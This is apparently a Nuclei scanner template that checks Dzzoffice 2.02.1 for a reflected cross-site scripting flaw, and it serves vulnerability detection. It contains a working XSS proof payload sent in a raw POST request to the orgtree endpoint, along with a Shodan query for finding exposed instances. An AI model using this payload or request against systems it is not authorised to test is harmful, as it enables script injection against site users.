47 lines
1.4 KiB
YAML
47 lines
1.4 KiB
YAML
id: dzzoffice-xss
|
|
|
|
info:
|
|
name: Dzzoffice 2.02.1 - Cross-Site Scripting
|
|
author: arafatansari
|
|
severity: high
|
|
description: |
|
|
Dzzoffice 2.02.1_SC_UTF8 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the zero parameter.
|
|
reference:
|
|
- https://github.com/zyx0814/dzzoffice/issues/183
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
cvss-score: 7.2
|
|
cwe-id: CWE-79
|
|
cpe: cpe:2.3:a:dzzoffice:dzzoffice:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: http.html:"dzzoffice"
|
|
product: dzzoffice
|
|
vendor: dzzoffice
|
|
tags: dzzoffice,xss
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /index.php?mod=system&op=orgtree&do=orgtree HTTP/1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
id=%23&nouser=0&moderator=0&zero=<img+src=x+onerror=alert(document.domain)>&stype=0&range=0&showjob=0
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '"text":"<img src=x onerror=alert(document.domain)>'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a00463044022009ccd4535e62dfd927fd58dd7f09356cfdf7733957170029354843bcced522fd022020d6bf0ce2cfddde3f4a1b411b6c0e944e69e808e8e4a333e962fd0a5912a4a4:922c64590222798bb761d5b6d8e72950 |